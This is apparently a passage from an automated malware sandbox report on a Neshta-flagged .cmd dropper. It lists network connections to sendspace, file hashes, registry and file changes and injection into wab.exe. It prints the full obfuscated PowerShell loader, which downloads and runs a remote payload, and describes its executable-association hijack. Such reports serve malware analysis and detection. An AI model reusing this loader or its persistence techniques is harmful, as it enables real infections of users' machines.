Tyve, R dd$LobinSPyritpProterScru.iSubmigNederhReduntBn eb) Mart ';$Spright=$Mbelfabrikant[0];Delhed (Afvarslingerne ' Krs,$ProkugmouselIngenoCapesbCharaa burrl Cons:ForldRKundenNazitnWhimseAwakabLavi.rde.latAnielr Recc=s,ces( MonoTKr ste Spios SjuntVivis- VestP Syn aKaraktWe nahAtomb Fortr$ emnoSV.lkypRefr.r S,ppiOvertg On,uhHissettran.)Te.ze ');while (!$Rnnebrtr) {Delhed (Afvarslingerne 'Eurus$Hose gDiaselNot coSuperbSnydeaSeawalStraa: FolkB FernoGha,egOpgrea,ilnan pu.jm Crueetran l Ran.dSuperelignirHemateLobeo=Fods $FremftPa,asrmelituNeuroeTipni ') ;Delhed $Frugtknudernes;Delhed (Afvarslingerne 'NonloSOptatt PhilaTwin rSvaletDin.e-UnlanS NonslCit,eeKontoeJou.tpRo nd Trter4Dagsa ');Delhed (Afvarslingerne 'Dyrer$.antogFlop.l Che,o Lo,ebfla.taSlew.lOvert: HarpR SignnundemnD,rrseTopmib underOutletSvredrPos i= Mari( Cho T ,eenePa,losSyvkat,unai- StrmP KlovaStatutTopsehPopu, Idelf$ DdelSRepulpRegrar F.gai Uds.g kohohBl,nkt For.)Hexas ') ;Delhed (Afvarslingerne 'cry t$ Favoglsninl SkiloHamelbSapiea Bo.slR,ubo:,eoliRDrabbeUdsorm AfbreMyth m B.vibTe,areHollor Cheee Le,id vade=Somal$Wh,tegScabblLowesoGalopb Ap.iaSimillOverb: Lim.b PuggaPrewelPhot,l RadiiScintsAvo ctSouleo R guc ProcaDeni rCathod K.eoiRe acobr zegL dporAbortaAggl pEvilsh SeisyFixat+ D,nk+.arqu%Parab$,ndviUOblignHoflemgenn,oUn.ren KontoThreapSogneoEufeml Remai FritzAlpeniP kkenPentagBuler.BambucEnz,moTeanauPrecin patitPh,en ') ;$Generaene=$Unmonopolizing[$Remembered];}$Surmounting=305594;$Spejle=29502;Delhed (Afvarslingerne 'Unlea$GangagEle.tl .edbo RecobBelleaImperlMolti:Em.naC Downr,lagsaF,ikkn Wibei PrimobestagSig.ar BlisasuprapAn,toh Ugebeb,snirPolyg2Terra3 E sk8 haak Fersk=p,ess BadehGCho ieGaloctStift-PauseCUnsamo .nocnMim.stGenfreHateanStikntUnder Tran.$FormaSFor,dpAvissrTr,nsi ,ndegDamiah,ejectTulip ');Delhed (Afvarslingerne 'Super$ CelagravnelCrimeoRivalb Top aNonnolSkalp:MufflEHelulkTrinbsConflp Inv,lA hidoMilied PaukeR,mswrOlietiEnspen EntagCoalasFalla Third=Lat r Lui.[,nmanSArraiy ManisIsl,dtFreemeHovedmConsi.priorC Flabo Fr nnoversv Hd.reVrtsdrSponstGunsl] c.rt:Pagan: Ch tFInlanrme,teokvi kmPresaBAtomia TredsUnfelef,rhe6 Seps4tegniSOut.etGua.frSwa iiphot.nBesgegBegyn(Impor$LinieCRhodor Am ha.estsnStatii MetaoDapplgSupprrCrickaSp ldpIndsmhS,mpleA.tssrSinap2U res3Miner8Dumet)Octup ');Delhed (Afvarslingerne 'Skins$ antigIncurl.owmoo AndebSomatakantelAchil:Phot.S BranuTerkebAshilgCodbaiBarrea Klarn NonptPr pr Conju= nett Env,l[Figu,S,vermySmrsysUndert AmeleAbbedmWindf. R.ndTstraneStalaxSll.rtSimie. elleEFi ennCler c,inisoDyrebdBrnefi,verpnEd,ikgT lsk]Spica:Blas,: spekARereaS Fy iCLini,IGenopI Unr,. B.ldGSoc aeHjordtReproSUdso,tFeudar krmsiTea,snUdgy gNettl(Disp $Ban.oEBearbkoestrs CanoppeliklS.reao elledljer,ean ifrzooksi Huskn Ko tg Emots Vind)Forb, ');Delhed (Afvarslingerne 'Sk.iv$Middagcompul Sindokus.mbVeineaNedg lGer.n:FordyMDyn.loSanktrCoppeeUrinedPriva1Techn6Aflbs2Mot.r=Revol$HunyaSApprouJannebKlagegVenteiRel eaPlanlnNoncatSulte.Po.tis ekstuSisyfb Blegse,tert Yng rUnderiHelbrnRe,segamme.(Etfag$ .pasSSti,lu B.lkr Amstm poloo,ungeuValidnDansktWeldsiOpdatnNon,egIndta,Ther.$ManliS.rosspkavale DiakjBlufflOffeneTilse) a.st ');Delhed $Mored162;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.sendspace.com udp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs12n3.sendspace.com udp
CA 69.31.136.53:443 fs12n3.sendspace.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 172.64.149.23:80 crt.sectigo.com tcp
US 172.67.170.105:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n2.sendspace.com udp
CA 69.31.136.57:443 fs13n2.sendspace.com tcp

Files

memory/2240-10-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2240-9-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2240-8-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2240-7-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2240-6-0x0000000002590000-0x0000000002598000-memory.dmp

memory/2240-5-0x000000001B130000-0x000000001B412000-memory.dmp

memory/2240-4-0x000007FEF536E000-0x000007FEF536F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar9332.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2I3P49Y1HG96QZF7VILV.temp

MD5 897a0e672a86dca163f393e0a73527ee
SHA1 12347acaaf9dc79f8de19e68423e162c4e473979
SHA256 0715c670c9b03b53a9f911a16ce959307b41b07830097552a24dbe01162355fb
SHA512 8ed2ad08902618cff5855f1cb294c557a35793c656ff509182273bfefac54df37c089c2e56753acdcf2546de7b245bcb6adffc2e4d7a76bb36faa92342fa35f5

C:\Users\Admin\AppData\Roaming\Bridgewards.Hal

MD5 ea20645d0a478dbb7ed3feaae27b7600
SHA1 4887a243769c6b7784c3e80024cbf2f4bb24303d
SHA256 e16f839346511b0f52f399c81148daccbe0d3465e60cd6153b57bacc3a2395cb
SHA512 ecef1f8709862074d483c7a92c4829217c41403b98e05d4873e6ae4eb934ba30b5fc1a8f1aa44b61167bd47da34b356d0d96da73969af45c29beef10b254b95b

memory/2240-57-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2240-58-0x000007FEF536E000-0x000007FEF536F000-memory.dmp

memory/2808-60-0x00000000062A0000-0x0000000009E5F000-memory.dmp

memory/1940-62-0x00000000006B0000-0x0000000001712000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 004bc7acd789ef49b2607b16a182067f
SHA1 98b24da01c3779efecf3c11922500b2105311a10
SHA256 f302baa8cf8dc99569f671062a21e0ac46198c68bd1934b6135d58f42bbf94ca
SHA512 9637818da1d9a066ddee4cf51e061d2aefe4e910ac3bbe465b7093c8f1e913c64abdcacdeca3e9c6fe8fd7b29ef694974a4c007a1445b5c869667cd3a4780f89

memory/1940-89-0x00000000006B0000-0x0000000001712000-memory.dmp

C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe

MD5 fa9e52ffa7ca60c38d490abd96cb3952
SHA1 b8ef0fafe68035128978f0383fab3863301aa62e
SHA256 d416c89d8a396915106fb2462430d90bbe1be05c444098bfc671bb3d12089d96
SHA512 26d959e451ee66a26ead7b7971b3993c3f6882abd912ba5a641215cb90f18bbb7ac94e7ae3008bbf2c1c497e6989b8a607b63967b6dd3aa1ef4a5a953342d1ce

memory/2240-99-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

MD5 9e2b9928c89a9d0da1d3e8f4bd96afa7
SHA1 ec66cda99f44b62470c6930e5afda061579cde35
SHA256 8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043
SHA512 2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

memory/1940-172-0x00000000006B0000-0x0000000001712000-memory.dmp

memory/1940-173-0x00000000006B0000-0x0000000001712000-memory.dmp

memory/1940-174-0x00000000006B0000-0x0000000001712000-memory.dmp

memory/1940-175-0x00000000006B0000-0x0000000001712000-memory.dmp

memory/1940-176-0x00000000006B0000-0x0000000001712000-memory.dmp

memory/1940-178-0x00000000006B0000-0x0000000001712000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-24 01:08

Reported

2024-05-24 01:11

Platform

win10v2004-20240508-en

Max time kernel

133s

Max time network

124s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9.cmd"

Signatures

Neshta

persistence spyware neshta

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 524 set thread context of 1812 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~4.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MIA062~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13187~1.37\MICROS~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Program Files (x86)\windows mail\wab.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4848 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4848 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4220 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4220 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4220 wrote to memory of 524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4220 wrote to memory of 524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4220 wrote to memory of 524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 524 wrote to memory of 3232 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 3232 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 3232 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 524 wrote to memory of 1812 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 524 wrote to memory of 1812 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 524 wrote to memory of 1812 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 524 wrote to memory of 1812 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 524 wrote to memory of 1812 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.maizeoliaUn,ttbPsalmlPartiyA.phi] ronh=Infra$ GummF ou.se Discrsmuttt PretiCyst lPlur i I,cozRoamsiByzonnMul.igHexah ');$Frugtknudernes=Afvarslingerne 'Torum$SemiwGaxomelT ntauCradlmSikk eCairflLjertiUd.ikk,ncalecupma.JuvelDseptioAtomiwExhilnDkstolalbeioFl nraRgeredLi edF MechiAsh.nlCracceCupri(Kunst$suitcGgestaeSurlin subdeDato r alloa DereeNerv,nD sore Tyve, R dd$LobinSPyritpProterScru.iSubmigNederhReduntBn eb) Mart ';$Spright=$Mbelfabrikant[0];Delhed (Afvarslingerne ' Krs,$ProkugmouselIngenoCapesbCharaa burrl Cons:ForldRKundenNazitnWhimseAwakabLavi.rde.latAnielr Recc=s,ces( MonoTKr ste Spios SjuntVivis- VestP Syn aKaraktWe nahAtomb Fortr$ emnoSV.lkypRefr.r S,ppiOvertg On,uhHissettran.)Te.ze ');while (!$Rnnebrtr) {Delhed (Afvarslingerne 'Eurus$Hose gDiaselNot coSuperbSnydeaSeawalStraa: FolkB FernoGha,egOpgrea,ilnan pu.jm Crueetran l Ran.dSuperelignirHemateLobeo=Fods $FremftPa,asrmelituNeuroeTipni ') ;Delhed $Frugtknudernes;Delhed (Afvarslingerne 'NonloSOptatt PhilaTwin rSvaletDin.e-UnlanS NonslCit,eeKontoeJou.tpRo nd Trter4Dagsa ');Delhed (Afvarslingerne 'Dyrer$.antogFlop.l Che,o 